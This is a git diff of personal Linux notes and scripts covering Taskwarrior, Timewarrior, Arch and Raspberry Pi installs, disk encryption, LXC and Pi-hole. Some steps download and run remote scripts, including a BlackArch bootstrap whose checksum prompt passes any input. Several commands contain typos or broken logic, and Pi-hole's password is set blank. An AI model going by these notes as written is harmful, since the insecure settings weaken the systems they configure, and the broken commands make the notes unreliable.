e29bffe0-72d8-45f2-b1f9-f29397cfab16
|
||||
|
||||
# Different:
|
||||
|
||||
$ task config taskd.certificate -- ~/.task/first_last.cert.pem
|
||||
$ task config taskd.key -- ~/.task/first_last.key.pem
|
||||
$ task config taskd.ca -- ~/.task/ca.cert.pem
|
||||
|
||||
# Trust
|
||||
|
||||
For troubleshooting we can set:
|
||||
|
||||
> taskd.trust=ignore [hostname]
|
||||
|
||||
> taskd.trust=allow all
|
||||
|
||||
> taskd.trust=strict
|
||||
|
||||
# User Defines Attributes - UDA
|
||||
|
||||
Each UDA has two to four attributes: type (numeric or string) and label are necessary:
|
||||
|
||||
> task config uda.THING.type {numeric,string}
|
||||
|
||||
> task config uda.THING.label Thg
|
||||
|
||||
Constrain these attributes to a comma-delineated set with:
|
||||
|
||||
> task config uda.THING.values brown,orange,green
|
||||
|
||||
You can also show how important the Attribute makes something:
|
||||
|
||||
> urgency.uda.THING.coefficient=2.8
|
||||
|
||||
# Aliases
|
||||
|
||||
Alias `delete' to `rm' with:
|
||||
|
||||
task config alias.rm delete
|
||||
|
||||
|
||||
|
41
data/taskwarrior/taskd.sh
Normal file
41
data/taskwarrior/taskd.sh
Normal file
@ -0,0 +1,41 @@
|
||||
#!/bin/bash
|
||||
|
||||
export TASKDDATA=/var/lib/taskd
|
||||
|
||||
sudo mkdir -p $TASKDDATA
|
||||
sudo chown taskd:$(whoami) $TASKDDATA
|
||||
sudo chmod 775 $TASKDDATA
|
||||
|
||||
cp -r /usr/share/doc/taskd/pki/ $TASKDDATA
|
||||
|
||||
cd $TASKDDATA/pki
|
||||
|
||||
sed -i s/localhost/$(hostname -f)/ vars
|
||||
|
||||
./generate
|
||||
|
||||
cp client.cert.pem $TASKDDATA
|
||||
cp client.key.pem $TASKDDATA
|
||||
cp server.cert.pem $TASKDDATA
|
||||
cp server.key.pem $TASKDDATA
|
||||
cp server.crl.pem $TASKDDATA
|
||||
cp ca.cert.pem $TASKDDATA
|
||||
|
||||
taskd config --force client.cert $TASKDDATA/client.cert.pem
|
||||
taskd config --force client.key $TASKDDATA/client.key.pem
|
||||
taskd config --force server.cert $TASKDDATA/server.cert.pem
|
||||
taskd config --force server.key $TASKDDATA/server.key.pem
|
||||
taskd config --force server.crl $TASKDDATA/server.crl.pem
|
||||
taskd config --force ca.cert $TASKDDATA/ca.cert.pem
|
||||
|
||||
cd $TASKDDATA/..
|
||||
taskd config --force log $PWD/taskd.log
|
||||
taskd config --force pid.file $PWD/taskd.pid
|
||||
taskd config --force server $(hostname -f):53589
|
||||
|
||||
taskd add org public
|
||||
|
||||
# 1515de89-cc81-4af6-a6a4-41c1430620b0
|
||||
|
||||
journalctl -u taskd
|
||||
|
156
data/taskwarrior/timew.md
Normal file
156
data/taskwarrior/timew.md
Normal file
@ -0,0 +1,156 @@
|
||||
# Setup
|
||||
Below commands mostly deal with timew alone. With taskwarrior installed as well, `locate on-modify-time`, then add it to ~/.task/hooks and make it executable.
|
||||
|
||||
#Summaries
|
||||
|
||||
Try:
|
||||
|
||||
> timew summary :yesterday
|
||||
|
||||
You can also use :week, :lastweek, :month, :quarter, :year, or a range such as:
|
||||
|
||||
> timew summary today to tomorrow
|
||||
|
||||
> timew today - tomorrow
|
||||
|
||||
> 2018-10-15T06:00 - 2018-10-17T06:00
|
||||
|
||||
Each of these can gain with the :ids tag.
|
||||
|
||||
# Basics
|
||||
|
||||
> timew start
|
||||
|
||||
> timew stop
|
||||
|
||||
> timew continue
|
||||
|
||||
> timew summary
|
||||
|
||||
> timew tags
|
||||
|
||||
And add ids with:
|
||||
|
||||
> timew summary :ids
|
||||
|
||||
|
||||
> timew track 10am - 1pm timewarrior
|
||||
|
||||
> timew track 1pm for 2h walk
|
||||
|
||||
# Adjusting Timewarrior
|
||||
|
||||
First get ids.
|
||||
|
||||
> timew summary :ids
|
||||
|
||||
Then if we're looking at task @2:
|
||||
|
||||
> timew move @2 12:00
|
||||
|
||||
> timew lengthen @2 3mins
|
||||
|
||||
> time shorten @2 40mins
|
||||
|
||||
# Forgetting
|
||||
|
||||
> timew start 1h ago @4
|
||||
|
||||
Or if your action actually had a break:
|
||||
|
||||
> timew split @8
|
||||
|
||||
Or maybe not?
|
||||
|
||||
> timew join @4 @8
|
||||
|
||||
> timew @8 delete
|
||||
|
||||
Start at previous time
|
||||
|
||||
> timew start 3pm 'Read chapter 12'
|
||||
|
||||
> timew start 90mins ago 'Read chapter 12'
|
||||
|
||||
Cancel currently tracked time.
|
||||
|
||||
> timew cancel
|
||||
|
||||
# Backdated tracking
|
||||
|
||||
> timew untag @3
|
||||
|
||||
|
||||
# Hints
|
||||
|
||||
* :quit - for automation
|
||||
|
||||
* :yes
|
||||
|
||||
* :color
|
||||
|
||||
* :fill - expand the time to fill out available time
|
||||
|
||||
* :adjust - automatically correct overlaps
|
||||
|
||||
* :ids - show id numbers
|
||||
|
||||
|
||||
# Times
|
||||
|
||||
* :yesterday
|
||||
|
||||
* :day
|
||||
|
||||
* :week
|
||||
|
||||
* :month
|
||||
|
||||
* :quarter
|
||||
|
||||
* :lastweek
|
||||
|
||||
* :lastmonth
|
||||
|
||||
* :lastquarter
|
||||
|
||||
* :lastyear
|
||||
|
||||
|
||||
|
||||
# Mistakes
|
||||
|
||||
task end.after:2015-05-01 and end.before:2015-05-31 completed
|
||||
|
||||
task end.after:today-1wk completed
|
||||
|
||||
# Errors with Python3
|
||||
|
||||
Replace
|
||||
`os.system('timew start ' + combined + ' :yes')`
|
||||
|
||||
with:
|
||||
|
||||
`os.system('timew start ' + combined.decode() + ' :yes')`
|
||||
|
||||
and
|
||||
|
||||
`os.system('timew stop ' + combined + ' :yes')`
|
||||
|
||||
with:
|
||||
|
||||
`os.system('timew stop ' + combined.decode() + ' :yes')`
|
||||
|
||||
|
||||
|
||||
# Fixing Errors
|
||||
|
||||
> curl -O https://taskwarrior.org/download/timew-dbcorrection.py
|
||||
|
||||
> python timew-dbcorrections.py
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
12
data/w3m.md
Normal file
12
data/w3m.md
Normal file
@ -0,0 +1,12 @@
|
||||
Ctrl+u to go to new url.
|
||||
|
||||
tab between fields.
|
||||
B to go back.
|
||||
|
||||
o for the love of options.
|
||||
|
||||
T for a new tab.
|
||||
'{' and '}' to change tabs.
|
||||
|
||||
'H' for help.
|
||||
|
59
distros/arch/arch_pi_install.md
Normal file
59
distros/arch/arch_pi_install.md
Normal file
@ -0,0 +1,59 @@
|
||||
# Initial Setup
|
||||
<!-- modified since testing
|
||||
-->
|
||||
|
||||
Some of this needs executed as root, so it's probably easier to do the whole things as root.
|
||||
|
||||
> fdisk /dev/sdX
|
||||
|
||||
o,n,t,c
|
||||
|
||||
> mkfs.vfat /dev/sdX1
|
||||
> mkdir boot
|
||||
> mount /dev/sdX1 boot
|
||||
|
||||
Create and mount the ext4 filesystem:
|
||||
|
||||
> mkfs.ext4 /dev/sdX2
|
||||
> mkdir root
|
||||
> mount /dev/sdX2 root
|
||||
|
||||
Download and extract the root filesystem (as root, not via sudo):
|
||||
|
||||
> wget http://archlinuxarm.org/os/ArchLinuxARM-rpi-3-latest.tar.gz
|
||||
|
||||
> tar zxvf ArchLinuxARM-rpi-3-latest.tar.gz -C root
|
||||
|
||||
> sync
|
||||
|
||||
Move boot files to the first partition:
|
||||
|
||||
> mv root/boot/* boot
|
||||
> Unmount the two partitions:
|
||||
> umount boot root
|
||||
|
||||
echo belgradecats > /etc/hostname
|
||||
echo "# /etc/hosts: static lookup table for host names
|
||||
|
||||
|
||||
```
|
||||
|
||||
<ip-address> <hostname.domain.org> <hostname>
|
||||
127.0.0.1 belgradecats.localdomain belgradecats
|
||||
::1 belgradecats.localdomain belgradecats ip6-localhost
|
||||
|
||||
```
|
||||
|
||||
# End of file" > /etc/hosts
|
||||
|
||||
# Get audio on
|
||||
|
||||
echo dtparam=audio=on >> /boot/config.txt
|
||||
|
||||
pacman-key --init
|
||||
pacman-key --populate archlinuxarm
|
||||
|
||||
pacman -Syyu base-devel git alsa-utils xf86-video-fbdev
|
||||
|
||||
timedatectl set-timezone Europe/Belgrade
|
||||
|
130
distros/arch/basic-install.md
Normal file
130
distros/arch/basic-install.md
Normal file
@ -0,0 +1,130 @@
|
||||
|
||||
|
||||
Keyboard layout changed.
|
||||
|
||||
> ls /usr/share/kbd/keymaps/**/*.map.gz
|
||||
|
||||
> loadkeys uk.map.gz
|
||||
|
||||
Check if boot mode is UEFI
|
||||
|
||||
> ls /sys/firmware/efi/efivars
|
||||
|
||||
Without efivars, the system must boot with BIOS.
|
||||
|
||||
# Check network's up
|
||||
|
||||
> ping archlinux.org
|
||||
|
||||
Set system clock properly
|
||||
|
||||
> timedatectl set-ntp true
|
||||
|
||||
Check disks
|
||||
|
||||
> lsblk
|
||||
|
||||
Make partition
|
||||
|
||||
> fdisk -l
|
||||
|
||||
- Boot: 200M
|
||||
|
||||
- Swap: Double Ram's a nice standard.
|
||||
|
||||
- \/: 15G
|
||||
|
||||
- Home: The rest
|
||||
|
||||
- var: probably doesn't need a partition, but can be nice if you're
|
||||
|
||||
* Worried about filling up with logs.
|
||||
|
||||
* Intending to fill up with torrents, which land in /var/.
|
||||
|
||||
parted alternative
|
||||
|
||||
mklabel gpt
|
||||
mkpart ESP fat32 1MiB 200MiB
|
||||
set 1 boot on
|
||||
name 1 efi
|
||||
|
||||
|
||||
Use pacstrap to get the base install.
|
||||
|
||||
> mount /dev/sda3 /mnt/
|
||||
|
||||
> mkdir /mnt/home
|
||||
|
||||
> mkdir /mnt/boot
|
||||
|
||||
> mount /dev/sda3 /mnt/home
|
||||
|
||||
> mount /dev/sda1 /mnt/boot
|
||||
|
||||
> pacstrap /mnt base base-devl vim
|
||||
|
||||
Make fstab notes for new system.
|
||||
|
||||
> genfstab -U /mnt >> /mnt/etc/fstab
|
||||
|
||||
> arch-chroot /mnt
|
||||
|
||||
> echo 'en_GB.UTF-8' > /etc/default/locale
|
||||
|
||||
> pacman -Sy networkmanager grub
|
||||
|
||||
> grub-install --target=i386-pc /dev/sda
|
||||
|
||||
> grub-mkconfig -o /boot/grub/grub.cfg
|
||||
|
||||
set local time
|
||||
|
||||
> ln -sf /usr/share/zoneinfo/Europe/Belgrade /etc/localtime
|
||||
|
||||
Find the desired locale's and uncomment them.
|
||||
|
||||
> vi /etc/locale.gen
|
||||
|
||||
> locale-gen
|
||||
|
||||
Make your keyboard changes permenent with:
|
||||
|
||||
> vi /etc/vconsole.conf
|
||||
|
||||
then set: `KEYMAP=uk.map.gz`
|
||||
unsure about this bit - is this name just for the loadkeys function?
|
||||
|
||||
make a hostname
|
||||
|
||||
echo pc > /etc/hostname
|
||||
|
||||
Set hostnames for network, or at least your own.
|
||||
|
||||
> vi /etc/hosts
|
||||
|
||||
# This should have the following, at least:
|
||||
|
||||
127.0.0.1 localhost
|
||||
::1 localhost
|
||||
127.0.1.1 [hostname].localdomain [hostname]
|
||||
|
||||
If the system has a permanent IP address, it should be used instead of localhost.
|
||||
|
||||
Ping some sites to make sure the network's working
|
||||
|
||||
> passwd
|
||||
|
||||
> exit
|
||||
|
||||
> umount -R /mnt
|
||||
|
||||
Remove retarded beep sound:
|
||||
|
||||
> sudo echo "blacklist pcspkr" >> /etc/modprobe.d/nobeep.conf
|
||||
|
||||
> rmmod pcspkr
|
||||
|
||||
# Fonts
|
||||
|
||||
sudo pacman -S ttf-hack ttf-font-awesome ttf-fira-mono
|
121
distros/arch/basic-install.sh
Normal file
121
distros/arch/basic-install.sh
Normal file
@ -0,0 +1,121 @@
|
||||
|
||||
Commands not preceded with # or $ are lines in config files.
|
||||
|
||||
Keyboard layout changed.
|
||||
|
||||
ls /usr/share/kbd/keymaps/**/*.map.gz
|
||||
|
||||
loadkeys uk.map.gz
|
||||
|
||||
Check if boot mode is UEFI
|
||||
|
||||
ls /sys/firmware/efi/efivars
|
||||
|
||||
Without efivars, the system must boot with BIOS.
|
||||
|
||||
Check network is up
|
||||
|
||||
> ping archlinux.org
|
||||
|
||||
Set system clock properly
|
||||
|
||||
> timedatectl set-ntp true
|
||||
|
||||
Check disks
|
||||
|
||||
> lsblk
|
||||
|
||||
Make partition
|
||||
|
||||
> fdisk -l
|
||||
|
||||
- Boot: 200M
|
||||
|
||||
- Swap: 12G???
|
||||
|
||||
- \/: 15G
|
||||
|
||||
- Home: The rest
|
||||
|
||||
parted alternative:
|
||||
|
||||
> mklabel gpt
|
||||
|
||||
> mkpart ESP fat32 1MiB 200MiB
|
||||
|
||||
> set 1 boot on
|
||||
|
||||
> name 1 efi
|
||||
|
||||
Use pacstrap to get the base install.
|
||||
|
||||
> mount /dev/sda3 /mnt/
|
||||
> mkdir /mnt/home
|
||||
> mkdir /mnt/boot
|
||||
> mount /dev/sda3 /mnt/home
|
||||
> mount /dev/sda1 /mnt/boot
|
||||
|
||||
> pacstrap /mnt base base-devel vim
|
||||
|
||||
Make fstab notes for new system.
|
||||
|
||||
> genfstab -U /mnt >> /mnt/etc/fstab
|
||||
|
||||
> arch-chroot /mnt
|
||||
|
||||
echo 'en_GB.UTF-8' > /etc/default/locale
|
||||
|
||||
pacman -Sy networkmanager grub
|
||||
|
||||
> grub-install --target=i386-pc /dev/sda
|
||||
|
||||
> grub-mkconfig -o /boot/grub/grub.cfg
|
||||
|
||||
set local time
|
||||
|
||||
> ln -sf /usr/share/zoneinfo/Europe/Belgrade /etc/localtime
|
||||
|
||||
Find the desired locale's and uncomment them.
|
||||
|
||||
> vi /etc/locale.gen
|
||||
|
||||
> locale-gen
|
||||
|
||||
Mkae your keyboard changes permenent with:
|
||||
|
||||
> vi /etc/vconsole.conf
|
||||
|
||||
then set: `KEYMAP=uk.map.gz`
|
||||
|
||||
Make a hostname
|
||||
|
||||
> vi /etc/hostname
|
||||
|
||||
This should have the following:
|
||||
|
||||
```
|
||||
|
||||
::1 localhost
|
||||
127.0.1.1 [hostname].localdomain [hostname]
|
||||
|
||||
```
|
||||
|
||||
If the system has a permanent IP address, it should be used instead of localhost.
|
||||
Ping some sites to make sure the network's working
|
||||
|
||||
> passwd
|
||||
|
||||
> exit
|
||||
|
||||
> umount -R /mnt
|
||||
|
||||
Remove retarded beep sound
|
||||
|
||||
> # echo "blacklist pcspkr" > /etc/modprobe.d/nobeep.conf
|
||||
|
||||
> rmmod pcspkr
|
||||
|
||||
## Fonts
|
||||
|
||||
> sudo pacman -S ttf-hack ttf-font-awesome ttf-fira-mono
|
||||
|
46
distros/arch/blackarch.md
Normal file
46
distros/arch/blackarch.md
Normal file
@ -0,0 +1,46 @@
|
||||
|
||||
## Basics
|
||||
|
||||
List Blackarch Packages
|
||||
|
||||
> sudo pacman -Sgg | grep blackarch | cut -d' ' -f2 | sort -u
|
||||
|
||||
Install all with
|
||||
|
||||
> sudo pacman -S blackarch
|
||||
|
||||
List availalble groups with
|
||||
|
||||
> sudo pacman -Sg | grep blackarch | cut -d- -f2
|
||||
|
||||
Install a group with
|
||||
|
||||
> sudo pacman blackarch-$thing
|
||||
|
||||
e.g.
|
||||
|
||||
> sudo blackarch-cracker
|
||||
|
||||
## Install from Source
|
||||
|
||||
First install blackman.
|
||||
|
||||
> sudo pacman -S blackman
|
||||
|
||||
List categories:
|
||||
|
||||
> blackman -l
|
||||
|
||||
Then install all from a category with:
|
||||
|
||||
> sudo blackman -p [ category ]
|
||||
|
||||
Or install from source with:
|
||||
|
||||
> sudo blackman -g [ group name]
|
||||
|
||||
or
|
||||
|
||||
> sudo blackman -i [ package ]
|
||||
|
||||
|
26
distros/arch/blackarch.sh
Normal file
26
distros/arch/blackarch.sh
Normal file
@ -0,0 +1,26 @@
|
||||
#!/bin/bash
|
||||
# Just tested - working fine so far.
|
||||
|
||||
# update
|
||||
|
||||
pacman -Syyu
|
||||
|
||||
curl -O https://blackarch.org/strap.sh
|
||||
|
||||
sh="$(sha1sum strap.sh)"
|
||||
|
||||
echo "Does $sh equal 9f770789df3b7803105e5fbc19212889674cd503 ?"
|
||||
|
||||
read ent
|
||||
|
||||
if [ ! $(echo $ent | grep -c y ) ] ; then
|
||||
echo bye
|
||||
exit 1
|
||||
fi
|
||||
|
||||
chmod +x strap.sh
|
||||
|
||||
./strap.sh
|
||||
|
||||
echo Finished
|
||||
|
94
distros/arch/encrypted.md
Normal file
94
distros/arch/encrypted.md
Normal file
@ -0,0 +1,94 @@
|
||||
> # taken from https://0x00sec.org/t/arch-linux-with-lvm-on-luks-dm-crypt-disk-encryption-installation-guide-legacy-bios-system/1479
|
||||
|
||||
> # if you need wifi
|
||||
|
||||
> wifi-menu
|
||||
|
||||
> timedatectl set-ntp true
|
||||
|
||||
> fdisk -l
|
||||
|
||||
> parted /dev/sda
|
||||
|
||||
> (parted) mklabel msdos
|
||||
|
||||
> (parted) mkpart primary ext2 1MB 512MB
|
||||
|
||||
> (parted) mkpart primary ext4 512MB 100%
|
||||
|
||||
> (parted) print
|
||||
|
||||
> (parted) set 1 boot on
|
||||
|
||||
> (parted) quit
|
||||
|
||||
> fdisk -l
|
||||
|
||||
> cryptsetup luksFormat /dev/sda2
|
||||
|
||||
> # make a name. Here I use "crypt".
|
||||
|
||||
cryptsetup open /dev/sda2 crypt
|
||||
|
||||
> pvcreate /dev/mapper/crypt
|
||||
|
||||
> # now a group name - "usb"
|
||||
|
||||
> vgcreate usb /dev/mapper/crypt
|
||||
|
||||
|
||||
> lvcreate -L 8GB usb -n swap
|
||||
> lvcreaate -L 30G usb -n root
|
||||
> lvcreate -l 100%FREE usb -n home
|
||||
|
||||
> mkfs.ext4 /dev/mapper/usb-home
|
||||
mkfs.ext4 /dev/mapper/usb-root
|
||||
> mkswap /dev/mapper/usb-swap
|
||||
|
||||
> mkfs.ext2 /dev/sda1
|
||||
|
||||
> mount /dev/mapper/usb-root /mnt
|
||||
mkdir /mnt/home
|
||||
> mount /dev/mapper/usb-home /mnt/home
|
||||
mkdir /mnt/boot
|
||||
> mount /dev/sda1 /mnt/boot
|
||||
swapon /dev/mapper/usb-swap
|
||||
|
||||
pacstrap -i /mnt base base-devel efibootmgr grub
|
||||
|
||||
genfstab -U /mnt >> /mnt/etc/fstab
|
||||
|
||||
arch-chroot /mnt
|
||||
|
||||
############ new root #############
|
||||
|
||||
ln -sf /usr/share/zoneinfo/Europe/Belgrade /etc/localtime
|
||||
|
||||
# uncomment en_GT.UTF-8
|
||||
> vi /etc/locale.gen
|
||||
|
||||
> locale-gen
|
||||
|
||||
> # add `LANG=en_GB.UTF-8` to /etc/locale.conf
|
||||
|
||||
> vi /etc/locale.conf
|
||||
|
||||
> echo crypt > /etc/hostname
|
||||
|
||||
> # make sure keyboard encrypt lvm2 are on the list of HOOKS
|
||||
|
||||
> vi /etc/mkinitcpio.conf
|
||||
|
||||
> grub-install /dev/sda
|
||||
|
||||
> vi /etc/default/grub
|
||||
edit the GRUB_CMDLINE_LINUX=""
|
||||
|
||||
`GRUB_CMDLINE_LINUX="cryptdevice=/dev/sda2:usb root=/dev/mapper/usb-root"`
|
||||
|
||||
> grub-mkconfig -o /boot/grub/grub.cfg
|
||||
|
||||
> mkinitcpio -p linux
|
||||
|
||||
> pacman -S wpa_supplicant dialog
|
||||
|
15
distros/arch/fonts.md
Normal file
15
distros/arch/fonts.md
Normal file
@ -0,0 +1,15 @@
|
||||
# Basics
|
||||
|
||||
Update font-cache:
|
||||
|
||||
> fc-cache
|
||||
|
||||
List fonts:
|
||||
|
||||
> fc-list
|
||||
|
||||
Grab the part of the font name you need for Xresources:
|
||||
|
||||
> fc-list | cut -d: -f2
|
||||
|
||||
Add field 3 for styles.
|
94
distros/arch/lxc.md
Normal file
94
distros/arch/lxc.md
Normal file
@ -0,0 +1,94 @@
|
||||
This is an untested mess.
|
||||
|
||||
# Required
|
||||
|
||||
> sudo pacman -S lxc arch-install-scripts dnsmasq
|
||||
|
||||
Place the following in /etc/default/lxc-net to configure the network:
|
||||
|
||||
---
|
||||
|
||||
# Leave USE_LXC_BRIDGE as "true" if you want to use lx
|
||||
cbr0 for your
|
||||
# containers. Set to "false" if you'll use virbr0 or
|
||||
another existing
|
||||
# bridge, or mavlan to your host's NIC.
|
||||
USE_LXC_BRIDGE="true"
|
||||
|
||||
# If you change the LXC_BRIDGE to something other than
|
||||
lxcbr0, then
|
||||
# you will also need to update your /etc/lxc/default.c
|
||||
onf as well as the
|
||||
# configuration (/var/lib/lxc/<container>/config) for
|
||||
any containers
|
||||
# already created using the default config to reflect
|
||||
the new bridge
|
||||
# name.
|
||||
# If you have the dnsmasq daemon installed, you'll als
|
||||
o have to update
|
||||
# /etc/dnsmasq.d/lxc and restart the system wide dnsma
|
||||
sq daemon.
|
||||
LXC_BRIDGE="lxcbr0"
|
||||
LXC_ADDR="10.0.3.1"
|
||||
LXC_NETMASK="255.255.255.0"
|
||||
LXC_NETWORK="10.0.3.0/24"
|
||||
LXC_DHCP_RANGE="10.0.3.2,10.0.3.254"
|
||||
LXC_DHCP_MAX="253"
|
||||
# Uncomment the next line if you'd like to use a conf-
|
||||
file for the lxcbr0
|
||||
# dnsmasq. For instance, you can use 'dhcp-host=mail1
|
||||
,10.0.3.100' to have
|
||||
# container 'mail1' always get ip address 10.0.3.100.
|
||||
#LXC_DHCP_CONFILE=/etc/lxc/dnsmasq.conf
|
||||
|
||||
# Uncomment the next line if you want lxcbr0's dnsmasq
|
||||
to resolve the .lxc
|
||||
# domain. You can then add "server=/lxc/10.0.3.1' (or
|
||||
your actual $LXC_ADDR)
|
||||
# to your system dnsmasq configuration file (normally
|
||||
/etc/dnsmasq.conf,
|
||||
# or /etc/NetworkManager/dnsmasq.d/lxc.conf on systems
|
||||
that use NetworkManager).
|
||||
# Once these changes are made, restart the lxc-net and
|
||||
network-manager services.
|
||||
# 'container1.lxc' will then resolve on your host.
|
||||
#LXC_DOMAIN="lxc"
|
||||
|
||||
---
|
||||
|
||||
Then start the lxc NAT:
|
||||
|
||||
> sudo systemctl start lxc-net
|
||||
|
||||
> sudo systemctl restart NetworkManager
|
||||
|
||||
... and make sure the bridge's ip-range doesn't intefere withe local network.
|
||||
|
||||
> sudo arp-scan -I lxcbr0 -l
|
||||
|
||||
The lxc template is in /etc/lxc/default.conf. You need to modify it so that it uses lxcbr0.
|
||||
|
||||
---
|
||||
|
||||
/etc/lxc/default.conf
|
||||
lxc.net.0.type = veth
|
||||
lxc.net.0.link = lxcbr0
|
||||
lxc.net.0.flags = up
|
||||
lxc.net.0.hwaddr = 00:16:3e:xx:xx:xx
|
||||
|
||||
---
|
||||
|
||||
# Making machines
|
||||
|
||||
> sudo lxc-create -n roach -t download -- --dist archlinux --release current --arch amd64
|
||||
|
||||
Arch linux containers take up about 600 Megs.
|
||||
|
||||
To speed up the startup process, one can install haveged and start the haveged.service. Haveged stops the wait-time for system entropy creation.
|
||||
|
||||
Machines are stored in /var/lib/lxc.
|
||||
|
||||
# Starting
|
||||
|
||||
> lxc-attach -n roach
|
||||
|
31
distros/arch/pacman.md
Normal file
31
distros/arch/pacman.md
Normal file
@ -0,0 +1,31 @@
|
||||
|
||||
Packages are kept in /var/cache/pacman/pkg.
|
||||
|
||||
Delete unused old packages with:
|
||||
|
||||
> sudo pacman -Sc
|
||||
|
||||
Signatures are handled by the pacman-key, initially set up with:
|
||||
|
||||
> sudo pacman-key --populate archlinux
|
||||
|
||||
And refreshed with:
|
||||
|
||||
sudo pacman-key --refresh-keys
|
||||
|
||||
If you have usigned keys, you can refresh with:
|
||||
|
||||
> sudo pacman -Sc
|
||||
|
||||
or
|
||||
|
||||
> sudo pacman -Scc
|
||||
|
||||
Reset all keys with:
|
||||
|
||||
> sudo rm -r /etc/pacmand.d/gnupg/ && sudo pacman-key --init
|
||||
|
||||
If you're constantly getting 'everything corrupted, nothing upgraded', try running:
|
||||
|
||||
> sudo pacman -S archlinux-keyring
|
||||
|
BIN
distros/arch/perl.zip
Normal file
BIN
distros/arch/perl.zip
Normal file
Binary file not shown.
37
distros/arch/pi-hole-server.md
Normal file
37
distros/arch/pi-hole-server.md
Normal file
@ -0,0 +1,37 @@
|
||||
|
||||
> yay -S pi-hole-server pi-hole-ftl
|
||||
|
||||
> sudo systemctl disable systemd-resolved
|
||||
|
||||
> sudo systemctl stop systemd-resolved
|
||||
|
||||
> sudo systemctl enable pi-hole-server pihole-FTL
|
||||
|
||||
> sudo systemctl start pi-hole-server pihole-FTL
|
||||
|
||||
Remove that google dns server.
|
||||
|
||||
> pihole -a setdns 1.1.1.1 1.0.0.1
|
||||
|
||||
Disable pihole password by setting a blank password.
|
||||
|
||||
> pihole -a -p
|
||||
|
||||
# Configure cloudflare DNS
|
||||
|
||||
> yay -S cloudflared-bin
|
||||
|
||||
echo "proxy-dns: true
|
||||
proxy-dns-upstream:
|
||||
- https://1.0.0.1/dns-query
|
||||
- https://1.1.1.1/dns-query
|
||||
- https://2606:4700:4700::1111/dns-query
|
||||
- https://2606:4700:4700::1001/dns-query
|
||||
proxy-dns-port: 5053
|
||||
proxy-dns-address: 0.0.0.0" > /etc/cloudflared/cloudflared.yml
|
||||
|
||||
echo "
|
||||
PRIVACYLEVEL=0
|
||||
IGNORE_LOCALHOST=no
|
||||
AAAA_QUERY_ANALYSIS=yes
|
||||
|
5
distros/arch/problems.md
Normal file
5
distros/arch/problems.md
Normal file
@ -0,0 +1,5 @@
|
||||
|
||||
Broken Xorg
|
||||
|
||||
> sudo X -configure
|
||||
|
47
distros/arch/scripts/archpi.sh
Normal file
47
distros/arch/scripts/archpi.sh
Normal file
@ -0,0 +1,47 @@
|
||||
#!/bin/bash
|
||||
|
||||
# https://www.unixmen.com/install-arch-linux-raspberry-pi/
|
||||
|
||||
pacman-key --init || echo init fail >> log
|
||||
pacman-key --populate archlinuxarm || echo update fail >> log
|
||||
pacman -Syyuu || echo update fail >> log
|
||||
|
||||
sed -i s/#en_GB.UTF-8 UTF-8/en_GB.UTF-8 UTF-8/ /etc/locale.gen
|
||||
|
||||
echo 'LANG=en_GB.UTF-8' >> /etc/locale.conf
|
||||
|
||||
locale-gen
|
||||
|
||||
pacman -S base-devel htop ranger tmux lolcat fortune-mod texlive-most darkhttpd git figlet rxvt-unicode task timew calcurse fail2ban
|
||||
|
||||
if [[ $2 == all || $1 == all ]]; then
|
||||
pacman -S nnn feh dmenu rofi xf86-video-fbdev xorg xorg-xinit xorg-server xorg-server-utils xterm
|
||||
fi
|
||||
|
||||
# Audio
|
||||
echo 'dtparam=audio=on' >> /boot/config.txt
|
||||
|
||||
if [[ $1 == audio ]]; then
|
||||
pacman -S alsa-utils alsa-firmware alsa-lib alsa-plugins
|
||||
fi
|
||||
|
||||
echo 'device_tree_param=spi=on' >> /boot/config.txt
|
||||
|
||||
# for a vnc viewer
|
||||
if [[ $1 == vnc ]]; then
|
||||
tigervnc gcc geany i3 i3status compton feh sxiv rxvt-unicode
|
||||
fi
|
||||
|
||||
# Swap
|
||||
|
||||
cd /var/cache/swap
|
||||
|
||||
sudo dd if=/dev/zero of=swapfile bs=1K count=2M
|
||||
|
||||
sudo chmod 600 swapfile
|
||||
|
||||
sudo mkswap swapfile
|
||||
|
||||
sudo swapon swapfile
|
||||
|
||||
echo "/var/cache/swap/swapfile none swap sw 0 0" | sudo tee -a /etc/fstab
|
8
distros/arch/scripts/flatpak-steam.sh
Normal file
8
distros/arch/scripts/flatpak-steam.sh
Normal file
@ -0,0 +1,8 @@
|
||||
#!/bin/bash
|
||||
|
||||
flatpak --user remote-add --if-not-exists flathub https://dl.flathub.org/repo/flathub.flatpakrepo
|
||||
|
||||
flatpak --user install flathub com.valvesoftware.Steam
|
||||
|
||||
flatpak run com.valvesoftware.Steam
|
||||
|
16
distros/arch/scripts/pihole.sh
Normal file
16
distros/arch/scripts/pihole.sh
Normal file
@ -0,0 +1,16 @@
|
||||
#!/bin/bash
|
||||
|
||||
# This has been changed since testing.
|
||||
|
||||
yay -S pi-hole-ftl pi-hole-server
|
||||
|
||||
# Configuration in /etc/pihole/pihole-FTL.db
|
||||
# You can change DBINTERVAL to 60 or more to limit writes to disk
|
||||
|
||||
sudo systemctl disable systemd-resolved
|
||||
sudo systemctl stop systemd-resolved
|
||||
sudo systemctl start pihole-FTL
|
||||
pihole -g || echo '' ; echo 'Your pihole is gubbed' ; exit 1
|
||||
pihole -c
|
||||
|
||||
|
8
distros/arch/scripts/steam.sh
Normal file
8
distros/arch/scripts/steam.sh
Normal file
@ -0,0 +1,8 @@
|
||||
#!/bin/bash
|
||||
|
||||
flatpak --user remote-add --if-not-exists flathub https://dl.flathub.org/repo/flathub.flatpakrepo
|
||||
|
||||
flatpak --user install flathub com.valvesoftware.Steam
|
||||
|
||||
flatpak run com.valvesoftware.Steam
|
||||
|
10
distros/arch/scripts/yay.sh
Normal file
10
distros/arch/scripts/yay.sh
Normal file
@ -0,0 +1,10 @@
|
||||
git clone https://aur.archlinux.org/yay.git
|
||||
|
||||
cd yay
|
||||
|
||||
makepkg -si
|
||||
|
||||
yay -S perl-graph-easy signal-desktop sc-im ncpamixer xdg-utils-mimeo
|
||||
|
||||
yay -S ttf-tengwar-annatar
|
||||
|
10
distros/arch/steam.sh
Normal file
10
distros/arch/steam.sh
Normal file
@ -0,0 +1,10 @@
|
||||
#!/bin/bash
|
||||
|
||||
sudo pacman -S flatpak
|
||||
|
||||
flatpak --user remote-add --if-not-exists flathub https://dl.flathub.org/repo/flathub.flatpakrepo
|
||||
|
||||
flatpak --user install flathub com.valvesoftware.Steam
|
||||
|
||||
flatpak run com.valvesoftware.Steam
|
||||
|
22
distros/debian/apt.md
Normal file
22
distros/debian/apt.md
Normal file
@ -0,0 +1,22 @@
|
||||
# Problems
|
||||
|
||||
## apt
|
||||
|
||||
### Configurations?
|
||||
|
||||
